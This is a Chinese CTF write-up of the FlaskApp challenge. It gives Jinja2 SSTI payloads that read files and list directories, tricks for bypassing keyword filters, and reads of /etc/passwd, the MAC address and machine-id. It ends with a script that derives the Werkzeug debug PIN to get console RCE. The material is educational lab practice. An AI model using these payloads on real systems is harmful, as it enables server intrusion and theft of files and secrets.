首页 > 其他分享 >Flask PIN码生成终端RCE

Flask PIN码生成终端RCE

时间:2023-10-07 17:22:24浏览次数:36  
标签:__ .__ name PIN Flask app __.__ RCE class

来自

[GYCTF2020]FlaskApp

这道题确实不会,只能乖乖看wp做复现,但是学到了很牛逼的东西,一部分flask的SSTI注入知识和PIN码的生成机制。

点进去就是base64的加解密程序,hint处有个提示,源码里有PIN。

预期解应该是debug出pin码然后终端RCE。

非预期解

字符串拼接

这里用的是字符串拼接加SSTI注入搞定的好像。

先base64加密进去再到base64解密那里回显,本来想{{7*‘7’}},但是TypeError了,因为int和str类型不能直接运算,但是转念一想都给你说了是flask,直接{{7+7}}测有没有注入漏洞不就完了吗。

发现回显14,能注。

这里我也不会怎么写payload,直接开学吧:https://blog.csdn.net/RABCDXB/article/details/117773638

#查看根目录
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}

返回no no no,那应该有过滤啥的。

 

可能被过滤了关键字符,但是我们不知道关键字符,所以要读取一下源码app.py(直接用open)

#查看app.py
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}

可以看到,ban掉了flag、os、system、popen、import、eval、chr、reque、subprocess、commands、socket、hex、base64、*、?,基本上直接RCE是行不通,反弹shell也弹不了。

但这里可以使用字符串拼接进行绕过

import = imp + ort         os =o+s,利用了python的字符串特性。

#import os
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

得到根目录文件:

发现this_is_the_flag.txt,继续进行读取,payload:

#open('/this_is_flag.txt,'r').read()
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}

爆了。

 

倒转输出

使用切片的形式,简单测试一下,使用[::-1]既可以倒序输出全部,这样就可以绕过过滤。

payload:

#倒着写并且在后面加一个[::-1]
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read()}}{% endif %}{% endfor %}

也爆了。

 

预期解

文件包含,PIN码生成。

关于PIN码的相关资料请参考:Flask debug 模式 PIN 码生成机制安全性研究笔记

 

得到PIN码需要六个信息:

1、flask所登录的用户名
2、modname,一般是flask.app
3、getattr(app, “name”, app.class.name)。一般为Flask
4、flask库下app.py的绝对路径。这个可以由报错信息看出
5、当前网络的mac地址的十进制数。
6、机器的id。

对于1

flask用户名可以通过读取/etc/passwd来知道

#open('/etc/passwd/')
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read() }}{% endif %}{% endfor %}

说明用户名叫flaskweb。

对于2和3

易知为flask.app和Flask

对于4

直接乱输进debug:

得到app.py路径:

/usr/local/lib/python3.7/site-packages/flask/app.py

对于5

mac地址的十进制数

首先要得到网卡 /sys/class/net/eth0/address

#open('/sys/class/net/eth0/address','r').read()
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address','r').read() }}{% endif %}{% endfor %}

mac地址继续转化:

1)76:ef:88:de:d1:62

2)将:去掉--
76ef88ded162

3)在python中进行转化
print(int('76ef88ded162',16))
得到 130771165565282

对于6

docker机器的id,引用大佬的解释:

对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件。
对于docker机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id,
#open('/proc/self/cgroup','r').read()
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup','r').read() }}{% endif %}{% endfor %}

--这是原博客的做法,但是好像有点问题???因为这个不是docker了

【得到docker机器id,也就是1:name=systemd:/docker/(我这次复现是1:name=systemd:/kubepods.slice/之后的字符串】

所以我直接读/etc/machine-id:

#open('/etc/machine-id','r').read()
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/machine-id','r').read() }}{% endif %}{% endfor %}

得到:

1408f836b0ca514d796cbf8960e45fa1

 

万事俱备直接上大佬脚本:

import hashlib
from itertools import chain

probably_public_bits = [
     'flaskweb'# username
     'flask.app',# modname
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
 ]
 
private_bits = [
     '130771165565282',# str(uuid.getnode()),  /sys/class/net/ens33/address
     '1408f836b0ca514d796cbf8960e45fa1'# get_machine_id(), /etc/machine-id
]
 
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
 
cookie_name = '__wzd' + h.hexdigest()[:20]
 
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
 
rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                        for x in range(0, len(num), group_size))
            break
    else:
        rv = num
 
print(rv)

直接上/console然后RCE:

又学到了新知识,真有点大黑阔的感觉辣!!!!泰库辣!!!!!!!

标签:__,.__,name,PIN,Flask,app,__.__,RCE,class
From: https://www.cnblogs.com/EddieMurphy-blogs/p/17746996.html

相关文章

  • Flask审计+Nginx读取
    来自:[SUCTF2019]Pythonginx打开还是源码,直接审计:fromflaskimportFlask,Blueprint,request,Response,escape,render_templatefromurllib.parseimporturlsplit,urlunsplit,unquotefromurllibimportparseimporturllib.requestapp=Flask(__name__)#In......
  • 编写脚本,使用for和while分别实现192.168.0.0/24网段内,地址是否能够ping通,若ping通则输
    for方法:[14:20:07root@centos8~]#catping_for.sh#!/bin/bash​#================================================================# Copyright(C)2021IEucdInc.Allrightsreserved.## 文件名称:ping_for.sh# 创建者:TanLiang# 创建日期:2021年10月17日# ......
  • Salesforce input 标签 成熟文件上传方案,
    这次项目开发由于客户要求无法使用lwc标准的文件上传标签只能只能使用input标签来上传文件。下面是试验成功的方案。注意:只能上传3mb文件,salesforce限制。也希望看到的文章大神们指点一下。前端html<inputautocomplete="off"style="padding:0;......
  • Codeforces Global Round 2
    C题结论就是每行每列不同的个数必须是偶数。D题首先注意到对于长度相同的询问,答案都是一样的。同时相同的s可以直接丢掉。那么我们将s排序之后,将相邻的差再进行排序,然后将询问从小到大处理。相当于是将这些段拼接在一起。#include<cstdio>#include<algorithm>#include<cstr......
  • Alpine Linux 安装
    目录Alpine初始化Alpinelinux包管理alpineinstallnginx参考#中科大http://mirrors.ustc.edu.cn/alpine/https://mirrors.ustc.edu.cn/alpine/v3.15/main/https://mirrors.ustc.edu.cn/alpine/v3.15/community/#阿里云https://mirrors.aliyun.com/alpine/https:/......
  • 【计算几何】codeforces上面的一点简简单单的计算几何入门题
    开篇碎碎念我真的好喜欢开篇碎碎念啊(可恶真的是太话痨啦)最近有在cf上面写写题,唔不过还没上百题,过两天就可以写百题纪念啦,也还没上青,陌陌菜菜,陌陌在努力变强捏。cf1850GTheMorningStartag:用map进行维护,斜率与坐标的关系题目链接:G.TheMorningStar题意:找到一个点,使另一......
  • 「题解」Codeforces Round 883 (Div. 3)
    A.EscalatorConversationsProblem[题目](RudolphandCuttheRope)Sol&Code绳子长度大于钉子高度的要剪#include<bits/stdc++.h>typedeflonglongll;intmin(inta,intb){returna<b?a:b;}intmax(inta,intb){returna>b?a:b;}in......
  • 「题解」Codeforces Round 888 (Div. 3)
    A.EscalatorConversationsProblem题目Sol&Code签到#include<bits/stdc++.h>typedeflonglongll;intmin(inta,intb){returna<b?a:b;}intmax(inta,intb){returna>b?a:b;}intT,n,m,k,h;intmain(){scanf(......
  • 「题解」Codeforces Round 891 (Div. 3)
    A.ArrayColoringProblem题目Sol&Code只有数列的和为偶数时才符合要求,即有任意个偶数,偶数个奇数。将这些数分成两部分,发现两部分初始值\(0\)为偶数,偶数不会影响奇偶性,故需要偶数个奇数。#include<bits/stdc++.h>#defineN51typedeflonglongll;intmin(inta,......
  • CodeForces 814E An unavoidable detour for home 题解
    更好的阅读体验题意题目链接(洛谷翻译)给出\(n\)个点,和每个点的度\(d_i\)让你构造出一张无向图满足以下两条性质:点\(1\)到点\(i\)仅有唯一一条最短路。点\(1\)到点\(i\)的最短路长度大于等于点\(1\)到点\(i-1\)的最短路长度。求能构成满足条件的无向图......